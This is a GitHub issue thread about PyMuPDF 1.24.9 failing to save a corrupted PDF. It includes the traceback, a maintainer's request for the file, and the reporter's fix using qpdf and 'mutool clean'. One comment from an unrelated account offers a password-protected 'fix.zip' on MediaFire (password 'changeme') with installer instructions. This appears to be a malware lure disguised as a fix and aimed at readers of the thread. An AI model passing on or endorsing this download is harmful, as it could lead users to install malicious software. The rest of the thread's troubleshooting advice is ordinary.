### ISSUE TITLE
Saving into new PDF: "syntax error: expected object number"

### ISSUE THREAD

**Issue by Shohreh** [pymupdf/PyMuPDF#3809]
### Description of the bug

Hello,

A script that used to work with a 2023 release of PyMuPDF no longers now that I upgraded to 1.24.9.

It looks like the save() function changed.

What could I try?

Thank you.

### How to reproduce the bug

```
"""
PyMuPDF: PyMuPDF 1.24.9: Python bindings for the MuPDF 1.24.8 library (rebased implementation).
Python 3.12 running on win32 (64-bit).
"""
import pymupdf

doc = pymupdf.open(r"c:\Python\PDF\input.pdf")
print("Pages: ",doc.page_count)
doc.save("redacted.pdf")

"""
Pages:  331
MuPDF error: syntax error: expected object number

MuPDF error: format error: Repair failed already - not trying again

Traceback (most recent call last):
  File "C:\Python\redact.py", line 51, in <module>
    doc.save("redacted.pdf")
  File "C:\Users\fred\AppData\Local\Programs\Python\Python312\Lib\site-packages\pymupdf\__init__.py", line 5452, in save
    mupdf.pdf_save_document(pdf, filename, opts)
  File "C:\Users\fred\AppData\Local\Programs\Python\Python312\Lib\site-packages\pymupdf\mupdf.py", line 50693, in pdf_save_document
    return _mupdf.pdf_save_document(doc, filename, opts)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
pymupdf.mupdf.FzErrorFormat: code=7: cannot parse object (122 0 R)

"""
```

### PyMuPDF version

1.24.9

### Operating system

Windows

### Python version

3.12

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JorjMcKie** [comment]
Please provide the PDF. It seems it is corrupted causing the problem.

**Comment by Shohreh** [comment]
> Please attach the file here.

I didn't think of trying with another PDF :-/ After extracting a few pages with qpdfº, the error goes away.

Is there a command to pre-check PDFs for errors?

I attached fhe full file.

[bad.pdf](https://github.com/user-attachments/files/16751482/bad.pdf)

º qpdf.exe --empty -pages original.pdf 1-30 -- "test.pdf"

**Comment by Shohreh** [comment]
> Is there a command to pre-check PDFs for errors?

`mutool.exe clean bad.pdf good.pdf`
https://mupdf.readthedocs.io/en/latest/mutool-clean.html

Thanks for the help.
